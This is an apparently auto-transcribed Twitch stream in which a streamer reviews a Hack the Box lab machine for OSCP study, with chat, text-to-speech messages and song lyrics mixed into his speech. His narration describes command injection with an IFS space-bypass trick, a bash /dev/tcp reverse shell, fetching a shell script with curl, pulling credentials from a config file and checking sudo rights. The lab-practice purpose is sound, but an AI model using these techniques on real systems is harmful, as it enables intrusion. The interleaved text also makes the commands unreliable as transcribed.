Connected to channel Theo. Pebble Free says,
Hello.
Translated from Spanish.
Yo, Pebble. Rohan, yes, this is a cult. A cult of personality.
Yo, Theo.
Thank you. I'm just getting warmed up, actually. Yep. Just getting warmed up. Pylon Net for You? That's an interesting name. Can you help us out with it? Pylon Net for You. Is that right? Am I saying that right? Rahan, bro, don't just go and sacrifice people for your cult. No, we don't sacrifice people. We sacrifice their machines, their computers. Yes. Yeah. No, not people. No, absolutely not. Also, give me my TTS back. Well, when you ask nice like that, I mean, how can I say no? But no. We went over this. And you were doing the right things. Because, again, here, let's go full screen. Because I want you all to make fun of me. I do. Because chat is off limits. I want people to feel safe here. I want newbies to feel like they can ask any question. And if they have someone talking crap to them, talking shit to them about a basic question, well, new people aren't going to feel like asking questions here. And that's what I want. I want new people to be able to ask questions. So for that reason, for you all, chat is off limits. I don't want anyone talking shit to anyone else in chat. But you can make fun of me, which you were doing. But you kept doing it. So that's why we took TTS back. I mean, if you can prove that, like, you're here to help the community, then I'll give you TTS back. But every time you walk in chat, you come in hot. You're like about a 10. We need you to bring it down a scotch to like
585915 says,
Chad is off
5,
limits.
6-ish.
Kappa SS
Chat is off limits. Pylon, I have to understand your username or I can't move on. How are you doing today? Pylon Net. Let's check the leaderboard. One question, why are you bald? And also, stop committing war crimes in your videos. What kind of war crime am I doing in my videos? Why are you bald? We went over this. I've had my head shaved for like 20 years now. I shaved my head when I had a full head of hair. A glorious mane. I shaved my head off. I shaved my hair off. Pebble's still in first.
My hair is thinning. Dumb genetics not like this.
Rohan, that's another reason why. I explicitly told you why I shaved my head 20-some years ago. I told you why. And I told you why I haven't grown it back since. But instead of realizing and understanding that, you choosing to make fun of me again for it. Troll's gonna troll. I'm a huge fan of trolls, by the way. Huge fan.
Kappa.
Translated from Icelandic.
FT, how you doing today? I don't think I typed it right. Oh, yeah, I did. Okay. Bro, you literally said you want to be the victim. That's why I'm saying that. You're not you're not getting it. You're not getting it, Ron. Even though we've explained it. I'll explain it again. Yes. But not the victim. I'm the target for chat and any trolls. I am. But you're choosing to seize on the one thing. Like, on the one thing. So, Rohan, what's going on today? Okie dokie artichokes. Don't look at my password. Rohan, I'll reinstate the TTS if you can tell me why I shaved my head.
Trust Me X3 says.
Hello.
Trust me. How you doing? Welcome back. What's going on today? We are getting into some more hack the box. Oh, that's right. I got rebooted 3 times at the end of my last stream. You shaved your head.
Do you know who I am? Is there a chat history here on Twitch for the streamer? D.
No, like you haven't come up as a new chatter, so I know you've been here before. And you sound familiar. It tells me that you... Oh, I thought it told me when you started following, but it doesn't. You shaved your head because you want to become like a bald millionaire. I forgot his name. No, that's not why. What a shame. What an opportunity. You had the opportunity to get TTS reinstated. You let it slip through your fingers. All you had to do is tell me why I shaved my head. when I had a full head of hair and why I've never let it grow back.
Zizx says.
Zerks.
Hello, sir. How are you doing today?
Arjuku says.
You mean Professor X? Lol.
Xavier? No, bald millionaire. Become like a bald millionaire. I forgot his name. Zerks. Dooku, good morning. How are you?
TrustMeX3 says.
Something Bezos.
Papa Bezos? You think I look like Papa Bezos? He's more than a millionaire, bro. Sorry, bruh.
Sub message from Bright just says.
SSML error.
Stream Element says.
Bright Jess just subscribed for 20 months in a row, Pop Champ.
Good morning, Jess. Thank you for your sub. 20
Zizx
months.
says.
Fire.
20
says.
months.
Morning to you. For me is 6 p.m.
Good evening then, Dooku. So do you know Bright Jess?
Jess says.
Hi Theo, British love.
Do you know Bright Jess? If not, you should click the little heart up here in the corner. Jess is a great streamer. Chill, usually chill, calm streams, unless she's playing Helldivers. Then she's punching me and shoving me off mountains and stealing my samples.
We love Jess.
Stream Element says.
Trust me, X3 just subscribed for 10 months in a row, Pog Champ.
Trust me, thank you.
TrustMeX3 says.
How did I do that?
How did you do
This is
that? I don't know. How did you do
XD.
that?
Translated from Spanish.
Thank you for the sub. Trust me. Trust me, you've been subbed for 10 months in a row.
No idea what you're talking about, SQ Shy.
Dead Click says.
Yo.
Dr. Dead
Translated from
Click.
Estonian.
Here is your 8-bit Theo, Rohan.
TrustMeX3 says.
Now I finally got him confused.
Uh-oh.
Jess says.
Who are you?
Trust X3 British love.
Yeah, you do. You have me confused. Now I really feel like I should... Wait, did you change your name? And a hype train. We just started.
TrustMeX3 says.
Obviously.
Obviously. Well, who are you? Rohan, what would you like us to poll? What would you like the
Jess
poll to be
says-
about?
Theo British Angie.
No Angie face. What are you Angie for? I gotta do 8-bit Theo real quick. Where are you Angie?
TrustMeX3 says.
Angie.
Translated from Italian. Jess says.
How do you not know your viewers?
That's not fair.
British Angie.
They changed their name.
British old.
It's if it's
Translated
trust
from
me
Croatian.
times 3
Hack the Planet says.
saying Angie.
Hey there.
What is it, Madam Fabulous?
TrustMeX3 says.
Diffuke.
Translated from
Defuke.
Tagalog.
Defuke you. Bro, I'm already blue back there. Do you want me to put on a different color? And what is your mod poll, Rahan? By the way, everyone, Rahan got their TTS
Make it
privileges
more blue.
revoked. I can't. It's literally called Deep Blue. Here, you like
Brohat
light.
says.
Not just more blue is good. Broia 1 James a laugh. Deep blue.
Okay, how's that? That's like purple. I mean, that's pretty blue.
TrustMeX3 says.
That, S more of a turquoise.
Brohat says.
Points well spent.
If you say so. You can change it to, if you can let me know if you want me to change it to someone else, something else, bro. Rohan, what is your, the poll should be about if you should shave your beard too. Okay, yeah, that's a good one. I'll do that. Oh, come on. It didn't take it? Thank you. No, hell no. Maybe, yes, and no.
Jess says,
I beat you, tongue.
You did. Oh, trust me. I'll refund those police points back to you. Oh, you already did. Oh, wait a minute. It's someone that knows the police command. Spectre.
TrustMeX3 says,
Oh.
This is just a poll. Even if it comes back, yes, I'm not shaving my beard.
Jess says,
Question mark dollar hash at dollar.
And no talking
Translated
now
from
for
Haitian
15 minutes.
Creole. TrustMeX3 says,
That's very smart of me.
Just started. And they're like, shut up. Please stop talking. Okay. I do this. I'll stop talking. But, like, again, if someone new in chat comes in and no one says hi, I'm breaking it and I'm not refunding points.
Just stopping the investigation into my privacy.
And what else? What else do I break it for? Yeah, thank yous for subs or follows.
Jess says,
I won't be here telling cat Saj. So won't be able to say hi to people.
TrustMeX3 says,
I say hi for you.
Jess says,
No. Theo needs a beard.
TrustMeX3.
Bright Jess. Hi everyone. Britch stare.
Theo says,
The general assumption is that I have no idea what I am doing.
TrustMeX3 says,
That's why it's called painful IT.
Pebble3 says,
We still doing this, box?
TrustMeX3 says,
Gotta keep learning, right?
Ice Black Ice says,
Is this the one ring?
Jess says,
Rayhan Halal, you had to have read the warning to acknowledge it, so you know why you got warned already. Stop. This is my only public warning before I ban you.
TrustMeX3 says,
It is. The one to prove you all wrong. Bright Jan Hammer.
translated from Norwegian. Hack the Planet says,
What's going on in here?
TrustMeX3 says,
I speak em all.
Jess says,
Hi, Hack the Planet.
Here we go again, pretending we don't care, but I know at the end, you will always be there. Every step I take, I am scared to fall down, and sometimes love just isn't enough, but if I had a chance, I know I'd find my way back to you somehow. I'll try to move on.
TrustMeX3 says,
I hack the planet.
Whenever I try, the feeling just grows. I try to move on, but I'm haunted by your love. If anyone asks, I say goodbye to you somehow. Just go away, but they are still there. No matter how hard I pretend, just come out and break my heart. Anyway, it only beats for you. Just come out and break my heart. Anyway, I go back to you. I try to move on.
I just recognized that my founder's badge is gone. Damn it.
The feeling just grows. I try to move on.
Jess says,
TrustMeX3 know it's there.
TrustMeX3 says,
That happens when one disappears. I can't see it.
Jess says,
I can.
TrustMeX3 says,
Okay, that's good enough.
Jess says,
You only would lose it if Theo redistributes it. And that's only if sub laxes and he even knows he can lol.
TrustMix3 says.
I see. Thank you less than 3. Salbooby 7H30 giggle.
You're like a blessing. Oh, I wasn't waiting for you, wasn't waiting for you. Yeah, I was just wasting all my time living without you, time living without you. Yeah, like a rocket on a planet, that's how I feel. You're so gorgeous and you know it, you can't be real. And you use it to confuse me, but in the best ways. You make my day. Baby, keep loving, keep loving me just like you do it, like you do it, like you hit don't live, so we keep growing just like we do it, like you do it, like you. I want it like you want it too. Don't get insecure, baby. I like you, sure, baby. Cause that's the only way to build something amazing. And there's gonna be some bad wishes from people that don't really understand the feeling that we have. There's gonna be some bad wishes from people.
I don't know exactly what the dollar bracket is doing, but I think the space was the key part. They're also just using backticks. We did not use backticks, we used the dollar, but I think both of those are just fine. So let's try the sleep command, right? If we paste this in, we probably want to, I would guess, put a %20 here. That's URL encoded already. I don't know what I just did. I don't know where that FQ came, but it worked. Oh, I URL encoded the question.
Okay, I for a
So
second went
that's
looking for
sleeping
the tab that has an
seconds.
exec
Request
video
takes a
running
second,
roll.
so sleep 2. We should see like 2.9, I would guess. Or 3. That is good. So we had to URL encode this. So now let's try a reverse shell. So bash-c, bash-i, dev tcp 10.10.14.8, 9001, 0, and 1 like that. Put this in. It's hanging. And if I go back, we have a shell. What's going on YouTube? This is it from the future. And that whole IFS, I found that live in the recording, so it may have been a little bit more confusing. I still don't know exactly what's going on in this exploit, but I do kind of just want to show it because there's some really cool behavior with this thing. And if you're trying to find things blind, maybe this can help you. So to revisit, we have command injection right here. We do who am I? We can see Ruby.
Kitty
right?
says.
And the
Noiki
really
one
weird
jump.
behavior in this is when it comes to spaces. So we do uname, it's going to say Linux. That is fine with us. If we
Zipia
do
says.
-a,
Hey Nori.
we just get nothing. If we, let's see, if we do a %20 here, we just get the %20. It doesn't go on to say Linux, right? But if we double URL
Says.
Zupier.
Theo ignoring us
Now
today,
we can have
Nori.
space.
No, I'm not.
And this is where we went to and got sleep and everything working, right? But let's say this little space trick did not
Zipia
work.
says.
Where would we go from
Yes,
that,
me
right?
back.
And that's why.
Welcome back, Zupier. How you been?
And this also works.
It's very kind of you.
Linux here, it's not beginning like it does here. And
We haven't seen you in a while to still say sub. Thank you.
there's a lot of
Just
non-special
says.
characters we want to put after IFS,
So
right?
ignored.
I couldn't talk for 15 minutes.
Terminating it because I guess not a valid thing for the variable name. So if I did echo and we do please subscribe here, we don't get please subscribe. And that's because this variable is no longer just IFS, it is IFS please subscribe. So if we did a character that's not valid for the variable, like the dash, then it's going to say dash please subscribe. Now that's annoying because we don't always want
Pause
to put a
ignoring.
dash here.
Kitty
Then after
says.
recording the video, I figured
So
we could
because
fix
you
this.
cannot talk, you think you
Well,
are allowed
during
to
the video,
ignore
I guess.
us.
We
How am I supposed to say hi? Or not ignore you if
Yeah, feels like maybe it's a templating language. You gotta escape
I shouted you out while I was muted, while I couldn't talk?
brackets. You can potentially do it through backslashes, so we could try that. I'm just gonna do a few of these to show it doesn't work, and I don't think it does. But I didn't think IFS would work when I was recording this video for the first time because I only tried the brace expansion with squigglies and commas, right? So this is just me doing my due diligence and showing all the behavior. So these are the things that we
You say
tried,
hi by
right?
open
We
your
just
mouth,
send it
make a
lot,
high
and
sounding
we'll
shape, move
always
your
get
tongue,
nothing.
breathe out, and
So it
words
doesn't have to
happen.
do with
Thank you, Nori.
Jess
what we
says.
could do is kind of what this IFS trick is by default. This is, I think, it's called internal field separator, if I remember correctly. And by default, that's going to be a space. So that's why this works. Well, what if we just did a junk variable?
Zipia says.
This.
I had
What
some
happened?
months of focusing on my job
Yeah, please
because of a new
subscribe, and there's no
project I
dash.
got to prepare for. So I basically skipped all Twitch/YouTube for that time.
Okay, no worries. Thank you for explaining. Did you get the job? Did you get the job project squared away?
Right? Because the $ is also an invalid variable thing. So by saying $IFS, we get the space, and then we just give it a junk variable that doesn't exist, so like $hyphen, and the hyphen gets trashed, this gets treated as null, and just goes to please subscribe. So now that we know this trick, we can write a curl, right? So we could do curl, then IFS, and we want -o to write to an out file. So we can say dev shm, we'll call it shell.sh,
Kitty
and then
says.
oh,
I am hungry.
after
You should get some
Zipia
food.
says.
It's coming up in Q2 of 2025. They move our team into that project. So basically not a new job.
Oh, okay.
Kitty says. Feed me.
Here. You want a banana? That's all I have down here. I was going to eat this next, but I mean, you can have it if you want it. Here it comes. Nariki one bleb.
And I'm
Zupia.
guessing
Feeds fish.
Kitty says. Of course I want a banana noiki one bleb.
Thank you.
Jess says.
I want a banana too, Theo. Where's mine?
We can share.
British Angie.
No angry face. We can share. It's like, really, it's like friggin' hello? It's big. It's a big banana. So I'll split it in 3 ways.
FD85915 says.
Lol.
Zupia says.
And glad to see that nothing has changed here.
Nothing has
Jess
changed.
says.
I don't want to share British Angie.
I don't know what to tell you, Brit Jess. You're gonna have to share. That's all we have down here. And the caps are already out of control.
we're safe to do this because Slash is not a.
Holoship says.
Yo.
Holo ship. What's
Kitty
going on?
says, I will only share after
now
I
if you
get
wanna
the
put the
banana
URL.
first Noiki one bleb.
How do we know that you're gonna share it if you
Jess
get it?
Says,
What I want, Theo.
What do you
Zupia
want,
says-
Theo?
Hi, Hollow Ship.
Jess, I just said to myself, what do you want, Theo? I'm a little tired. I stayed up to watch that fight.
Holoship says.
Doing good. Laundry day and studying some CCNA later.
Very cool. Do you have these exams scheduled yet?
Zupia says.
Skip watching it. You'll thank me later.
I already watched it last night. I'm tired from staying up to watch it. The women's fight was amazing,
I got it.
and the fight before the women.
Holoship says.
Not yet.
Okay, when are you planning on taking it? Is anyone over? Yeah, we have a couple of people on YouTube. Hello, YouTube. You're
Jess
hearing the
says-
voices from text to speech on
It's
Twitch.
for you to get your shoes on, go to your car, drive to the store, get me fresh bananas, and a coffee while you're at it. Go back to your car, drive back, get out of your car, go into your house, take off your shoes, come back and give me said fresh bananas and coffee. Thanks.
Zupia
Thanks.
says.
Hello, YouTubes.
Okay, so that's it. That's all I got to do. That giant list of to do. That's it. Okay,
Kitty
not right now,
says-
but I will in a little bit.
Wow, so complex. Zupia says.
:D.
If we just started with
Jess
HTTP,
says-
that's going to get
Yes.
treated as a.
Okay. Yeah. Okay. Yeah, I'll get it in a little bit.
And we can say
Zupia says.
10.10.14.8 /
Translated from
So
Hungarian.
let's make sure this file exists. So I'm going to v root, and we'll do bin bash dash dash
Jess
I
says-
dev TCP 10.
No right now, British Angie.
0 and 1 like this. Okay. Chmod plus x root. Well, we didn't even need to make the executable because that's going to be going to the server. So if I run this, we see it does a get on root. So I think my curl command ran. So I am listening on 9001. So what if I now just do a bash? I'm going to do it in a new repeater window, and we'll say bash ifs dev shm shell.sh. Run it. It's hanging, and we get a shell. So that's how we could have done
FD85915
it
says.
without,
I'll take a latte and
Putting that
chocolate
space-
croissant, thanks, Kappa.
I think this IFS trick is super versatile.
And what am I supposed to do with the stream while I'm out getting everyone bananas and lattes and chocolate croissants? What am I supposed to do? Chair stream?
Kitty says. Now what I want you to do is go upstairs. Put on your shoes. Get in the car. Drive to McDonald's. Order me 5 Happy Meals.
5!
Drive back home. Enter the house. Take off your shoes. Give me the Happy Meals. Go back upstairs and leave me alone in the corner to cry while I'm eating my Happy Meals. Thanks. Jess
Thanks.
says.
Ooh, I want a chocolate croissant too now, Theo. Stream mobile IRL.
No, if
David Costa on YouTube says.
What you up to?
David Costa,
says-
how you doing today?
Did I mention that I imported hack tricks into my Obsidian vault? It's pretty slick to link it right from within the vault.
You can do that. I didn't know that. David Costa over on YouTube. We are working on. I should actually pin this, right? Of course, you won't see it on YouTube. We are going through Precious on Hack the
Jess
Box.
says,
I can't stop laughing.
I'm not getting everyone croissants and cappuccinos and mocha whip low fat whatevers.
N0TST3 says,
How'd Chief? Long time. Smiley face.
Pebble Free says,
Naughty, how are you doing?
Theo, why you still doing that box?
Because I'm going back and making sure I'm understanding everything that I did and updating my notes.
N0TST3 says,
Good tie. Hope all is well.
Yeah,
Jess
we're
says-
good.
I want one Jekyll Bang.
Zipia says,
Hi N0TSD3.
Kitty says, updating your nose?
Note. And we're getting close to pausing TTS again.
Zipia says,
Rooks Rob happy.
Maybe I am done. Or wait.
N0TST3
No, I didn't
says,
finish the inside
Hail
stuff.
Zupier.
Zipia says,
Don't let them get to you, dude. Keep going.
No, Pebble's trying to help. I have a goal to take this thing in January. So Pebble's right. I need to move on. But like the only way I figured this box out by just digging through random files. Like if that is the preferred method, then fine. But
Kitty, there is a.
translated from Spanish. Zipia says,
I handle the chat, you handle the studying.
oh no. You don't gotta handle chat. It's fine. Nori and Jess are messing around. They know I gotta take the test too. And I just started. So I'm easing into it here, and I'm updating the notes on this box. I'm not so much going through it, but I'm updating my notes or finishing my notes, and then we're moving on to the next box.
As Ruby. And we are the Ruby user, and we're in this PDF app. I'm
Can
going
you
to do Python
claim the
3
nine
C,
says?
import PTY.
Good
PTY.
afternoon, sir. Not doing Advent of Cyber this year?
Jess says,
No.
You've been working hard, Theo. You should take a break and de-stress. HD is great for that.
Maybe we'll do some
British
late.
win.
Maybe we'll do some Sunday night, but not yet. Not yet. I can't do Advent of Cyber. I want to do Advent of Cyber. I want to do Sans Kringle Con, but I have to do these Hack the Box boxes for OSCP study.
Kitty says, N0TST3, do you give Noiki one high?
Spawn,
Translated from
dash,
Italian. Pinaclamo9 says,
Terrible.
Control-Z, STTY,
Zipia
roll
says-
minus echo, foreground.
It's
now
not
replace.
even live yet, is
Now we
it?
have,
No, I think
in this
it.
file, we do have a
I don't know. I know it's close. They decided to release it earlier this year.
we can look at how this is, and
Okay, what's he doing? Okay, he found, and that's where I am. Cat config, it's a directory. CD config, ls, environment, cat environment.
we don't see anything sensitive here, right?
NVM
There
it
is
is.
config.ru. It's just run PDF controller, so nothing sensitive there. We do find .-type F. I'm going to export term is equal to X term so I can clear the screen. Read on that find command.
Arian Garong on YouTube says,
When is your exam?
I'm going to take it in January. and that is Arian. How you doing today? I'm going to take it in January.
Kitty says, Theo, guess
Nori.
what?
Chicken butt. Nailed it. Nailed it.
9 says,
I wanted to HTB but I'm too chicken lol.
No.
I don't know, I keep thinking it's too complicated.
No,
lol.
don't think like that. Don't think like that. Don't think like that. Just if you want to get started on it, Pinnock, you know your way around a Linux command line. If you want to get started on it, honestly, IPsec's content is great for this. Like, he deep dives stuff and then he comes back. He explains multiple ways. This is a 30-minute video on the box that we're doing right now. He has all the things broken out, and look at his website. Like, it's broken down by. So if you want to give it a try, find an easy one, find a video he did on it, and walk through it with him. But definitely start.
Yamesh says,
Iamesh, hi there, Dino Dance.
Jess
Hi,
says,
Iamesh.
At chicken butt.
Yep, nailed it.
translated from Japanese. Kitty says, me and Jess going to play Helldivers and you're not.
Well, why
Arian
would you
Durong
do
on
that?
YouTube says,
Am doing good. Been studying OSCP as well.
Hey, good
My
luck to you.
exam is on December.
Good luck to you in December, and keep us posted. I would really like to hear how you did. It's the new one in December, right? Good luck. You got this.
Zupia says,
Pinnock Gamer 9, there's a HDB Academy where you can start with ease.
Stream Element says,
Your first workout.
Poof.
Pod.
Yep, that's a good quote. Oh, you're streaming it.
Gamer9
Okay,
says-
yeah, stream.
Whoopee yeah, I have the subscription for it.
Kitty says, Noiki one bleb.
Bleb.
Jess says,
Theo Bleb.
Cause I need to stream. Theo.
Kitty says, wow, this game is such fun to play Noiki one jump.
Okay, okay. Have fun.
Jess says,
Right law.
translated from Estonian.
Okay.
Zupia says,
Pinnock Gamer 9, if you need any help, let us know.
I don't want to, but I have to.
Kitty says, so much fun. Boom,
Have
boom,
fun.
Boom. OMG charger bug.
I'm pausing TTS for about an hour, and I'll be back. I don't want to, but I have to. Okay. That is pretty funny. Charger bug. That's pretty funny. Okay, so what is find in the period is in this directory. Type file. Type file. Why would you? What? Oh, come on. You're better than that. Come on, ChatGPT. You're better than that. Okay, don't look at my password. You little shits. I bet someone clipped the screen too. You little hackers. I just picked up my phone for something. Oh, it's going to go to the authenticator. No, I joke. I joke. For a while there, when I'd open up my Bitwarden, people would clip waiting for me to dox myself. I had to delete like 20 clips because they're just of me opening up the password manager. Where am I? Find dot type F. Find dot type F. Find in this directory. Find, look for types of items, type file. I don't understand the usefulness of that command. So like, for instance, if I go into the PDF app directory, Seth, thank you kindly for that. Good afternoon. What are you working on? Thanks for hanging out over on YouTube, YouTubers. And by the way, there have been a lot more of you lately. I have the text-to-speech bot on mute for a little bit. And then I'll open it again on in about an hour. So he's in PDF app. Where am I? No clue. Here's LS. Oh, wait. Oh, so it goes through all the directories in the current directory and pulls out just the files. Okay, that actually is useful instead of like digging through. Absolutely not. Gun void. That hurt me more than it hurt you, Gunvoid Walker. Currently, you're trying to get your PGPT certificate. Spectacular, Seth. That is the TCM, of which I'm an affiliate for TCM, by the way. It just trees out the directory. I didn't know that. Man find? Oh, you want me to look it up? I gotcha. Yes. That is the text editor that shall not be named. That is... I don't even want to say it. I'll throw up on myself if I say it. But it is not approved for chat. Okay. Interesting. Okay. All right. Okay. That's actually great. That's actually a great command, because I would normally dig through them all. Okay, let's see what he says next. See where he goes. See where he goes to find, because what I found was I was digging through all the files and I found Henry. I found Henry and his password. So let me see if that's the route that he IPSec took also.
It doesn't look like there's going to be any sensitive files. I was looking for if it like connected to a database or something like that. I'm going to go in my home directory.
Sub message from Paul says.
Left.
Let's
We
go.
can see it here. We do find .-type F.
Pause. Thank you very much. Thank you for your sub. 11 months. Almost a year. Thanks, Pause. How you doing today?
Here, we can see there is...
Okay, so he jumped to his home directory and then used the same command. Zupir, I'm familiar with that as well. But that's SUID perm. Is that what that one is? Seth, I'm not sure. Honestly, I'm not a hiring manager. I think those help your chances, but that's a loaded question. And I'll try to answer it real quickly. In my opinion, you need a few things, but you got to give me a little bit of background. Are you in the market currently? Are you in the industry? Are you in college looking to enter the job market? Are you in a different career trying to make a transition into cybersecurity? What are you trying to do? And then Pebble can help as well answer this question if I miss it. Pause. I've been good. Thank you for asking. Working on this OSCP.
A bundle and config. So let's try catting this file. So cat.
Okay, so we found the file bundle config, and that's where it is. That's where it is. Henry and his password. All self-taught, looking to do full-time. I have a Google cybersecurity certificate. Okay. But what are you? Are you in college? Are you in university? Are you in high school? Are you in a different industry trying to enter cybersecurity? And then I feel like I can answer your question more better. You work full-time when you're not working on learning. So it sounds like you're not in cybersecurity. You're trying to enter the cybersecurity market, or are you in IT trying to transition? You're trying to enter from another job market. Okay, got it. So here are the few things I think help quickly. I think it's great you're doing certificates and you're learning, but you have to show, number one, things that you're working on. So the best way to do that is with a web page, a blog, or GitHub, where you're showcasing write-ups and scripts and programs and apps or whatever it is that you're working on. Throw it on this web app, on your website or blog or GitHub. Number one. So while you're learning stuff, you should be showing off what you're learning. You should be promoting it on one of those platforms. Number one. Number two, you should be actively relationship building. So like some people will say, well, network, and which is good. Like you need to meet people, but you need to be doing this not only on LinkedIn, but in IRL. Yeah. You need to be building relationships with people, not just liking their posts, not and like that's helpful too, but find local meetups around you and go to them. Find local conferences, maybe if it's even the next city over, and go to them. You need to relationship build and meet people and talk to them about what they're working on and so on, and those relationships tend to yield the best opportunities. And even if they're not looking at hiring, maybe someone they know is looking at hiring, and then introduces you. Are you, Seth? Are you in the States or are you overseas? And Whoopin, how you doing? And this is my GitHub to give you an idea of some things that I work on. And my notes that are published to GitHub. And Seth, keep us posted. Keep us posted. I've got a great Discord. You know, like everyone has a giant list of a giant collection of Discords. If you have room, please consider checking ours out. There's often industry professionals in here that can answer questions for you too. And there's industry professionals in the Discord as well. I just realized that I was TTS mute when Tagora walked in. So Tagora, if you're still here, I hope everything's well. I haven't even added anything to my notes just yet. I'm going to push LinPs down because I don't think it found anything the last time I ran it. But
Sub message from Wystone says
SSMO error.
Wystone, thank you kindly for your Prime sub. Do you know you get one Prime sub a month if you're an Amazon Prime member? And Wystone, with that one you get, you used it on me. Thank you very much. You've been a sub for 7 months. That's over half a year. Thank you. Did it not come through? It didn't. Here you go. Seth, no problem. Here you go. Oh, what? Did you redeem it again? No. Good. Actually, this would not be a bad idea to put into its own little file, bringing LinPs to a vulnerable machine. With a reverse shell running over Python, simple server at port 6969 on the attack machine, wget the LinPs down, and then start this Python server at that port, and then on the target machine, navigate to temp, curl it down like this. That is a good blurb there. So where is this thing at? Docs Linux try hack me reverse shell bash upgrade. I feel like this should be in its own file. Like CTOs, move file, move file to CTF, and then in CTFs also, we're going to put a new note for Lin P's curl down. Lin P's. No worries. Thank you for the lurk. The problem is your target doesn't have access to the internet. Then you would have to get it from your local machine. Correct. Yeah, that's what I have. Yeah, it's starting a simple server on my attack machine that the target machine connects to. So we're going to slide this guy down, and we're going to go in here, and we're going to start digging through files. David Henry. I'll give that a try. Trust me, had the same thing. Zupir had the same thing. Similar. Same or similar? Same, I think. Thanks, Gaming Golfer. You too. Code Devolving. Sorry, you snuck in there on me. How you doing, Code Devolving?
told myself I'd walk away. I think I'm ready now, ready now, ready now. I'm so over you dragging me down. Just wanna let it out, let it out, let it out. Feel so free, gonna shout it out loud. Without you, I'm limitless. There's nothing that you could do to break my spirit or shatter the silence. I'm telling you that I am fearless. Without you, I'm limitless. There's nothing that you could do to break my spirit or shatter the silence. Oh, I'm telling you that I am fearless. I will shatter the silence. Oh, I'm telling you,
I mean, okay. Oh, it was Sans. It was Sans KringleCon that I think launched earlier this year. It's active. It's active.
Copy, paste, and we see it's going to rubygems.org, and it has credentials, Henry, and this password. So if I cat Etsy passwd, we do have Henry as a user on this system. So why don't we just try and SSH in?
Thanks for the Lord, Gaming Golfer. All right. It's Hap. Twice, actually. Yeah, twice. I don't like to brag. Digitalosaurus X. Great name. Thank you for the follow. How you doing today? All right, we're logging in as Henry. There? Nah. Okay, from Henry, it was sudo L. There's a command or something that he can run as sudo. Thanks, Whoopin. Jealous. Small Beanie Hacker is great. She had a soccer game today. Another bloodbath. Not yet. Thanks for the hydrate. Let's see what IPSEC did.
So I'm going to get rid of this web server since we don't need it anymore. Whoops. Fresh. Full shift. Insert. We just have the user.txt and not much here. We can do a sudo-l, and I always check sudo whenever I have a credential, just because sometimes sudo asks you for a password, and you know it here, right? If I tried it on here first, it wants me to put the password for the Ruby user. Don't know it, so I can't view the list, right? So that's why sudo isn't normally my first go-to if I don't have the user's password already, because I don't want to run it and get the password wrong, because that creates more audit events. If you run it, have the password right the first time, it's much less suspicious, right? So looking at sudo, we do see
Correct.
user bin Ruby on update dependencies.rb. So if we look at this file,
what am I doing here? I feel like Obsidian should be right next to my terminal, because that's what I'm working on. Let's unpin Firebot. Let's unpin games. Yo. Thank you, Nick. DM Nick for the raid. How you doing today? DM Nick, if you're not aware, I'm going to shout him out now. DM is Dungeon Master, and one of the best, in my opinion. Matthew Mercer? Huh! DM Nick scoffs at Matthew Mercer like this. Scoff. Critical Role. More like pitiful role. Brennan Lee Mulligan from Dropout. Pshaw. Dropout is right. Drop out of DMing. Brennan. I didn't click enter yet. Oh my god, just love that. I nailed it. Gwenum. Gwenum streams too. How you doing, Gwenum? Let me turn on TTS for you, Gwenum. If Nori is still here, Nori, can you show us how to properly abuse text-to-speech?
Madam Fabulous says,
Approved.
Zipia
Approved.
says,
Question mark dollar hash dollar.
translated from Haitian Creole. Not Richie says. Kitty says, sorry charger bug noiki one is. It's Hap says.
Did someone say RRRRRR?
There you
Yuki
go.
says,
Speaking of DMing, message me when you're free to talk. Characters also lol.
Okay.
Madam
will.
Fabulous says,
but
Not
Nick,
Richie's, he patched this one
and
out,
I'll tell you
big
about this
sad.
too. The time I have available is going to be tight, but absolutely, I'll DM you. Can someone else also show the proper way to troll me as well? Just so Gwenum knows kind of, you know, where the line is.
Zupia says,
I came.
translated from Portuguese. Madam Fabulous says,
Neo Vim.
not Richie says, yo, let's go. It's Hap says,
Envim,
Poof.
envim.
Absolutely not.
Newton says,
Dominic Galafeflo.
Kitty says, you're old.
Yes, that's a good
Zupia
one.
says,
We gotta talk about privacy toe.
GoPro.
Newton says,
The reflection. My eyes.
it's Hap says,
Your mom.
Wonderful. You've all come very far. Very pointed, succinct trolling.
Hack the Planet says,
B7H30 hacks.
Check that guy
Newton
out.
says,
Bertu vibe.
Cypher, thank you for the 7 stream streak.
Love you,
GoPro.
Theo.
GoPro.
Zupia says,
B7H30 Angie Shake.
FD85915 says,
Get back to work, Kappa.
it's Hap says,
Banana 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 banana.
translated from
Spring.
Indonesian.
Hello.
Neo Spring says,
It was just
Not
discovered
Richie, Savage
recently
Lol.
translated
that
from French.
DM Nick plays Call of Duty Zombies. I used to play Call of Duty Zombies all the time with my buddies. It was actually one of the funnest things, in my opinion, about Call of Duty. And Nick was
Hack
playing it the other
Planet
day.
says,
That's crazy.
When I scrape together enough cash, I'm going to buy a replica ray gun. I love that little thing. I love it. I just restarted it.
Zupia says,
What is it, Call of Duty 103?
That's why we can never have nice things, chat. Too much. Too busy.
not Richie says,
Can I start it?
Dick. Translated from Dutch.
Can I
Hack the Planet says,
can I do something now?
I'm here for the memes.
Yeah. It's not hard, actually. Oh gosh.
Zupia says,
Wait for it.
Hack the Planet says,
Ha ha.
translated from Tagalog.
Another one.
You dicks. Thank you for the redeem, Neospring. Theo Stare.
Madam Fabulous says,
I'm helping. Upside down face. British old.
translated from Croatian. Neospring says,
GoPro bribed me lol.
Can I get back to
not
the
Richie
hacks?
says,
B7H30 hacks.
Can I get back to the hacks? Are you all done? Are you all done having fun, chat? Can I get back to the hacks?
Zupia says,
Go for another try.
Thank you for the push-ups, Madam Fabulous. What's going on here? You have caps lock on, dum-dum. Okay. We had a Netcat listener going on port 42669. And my IP is still the same. And we know we were in Henry. What? Sweet. I have to stabilize the cell too. Nope. Nope. Nope.
Its app says
TTS off.
It is, so I can focus here. 18 more minutes. Nope, don't remember it. Can't remember. Can't remember. Export term. Henry. Oh, Henry, you silly goose. Now, sudo L.
Madam Fabulous says
Henry is a silly goose. He always forgets, so he reuse.
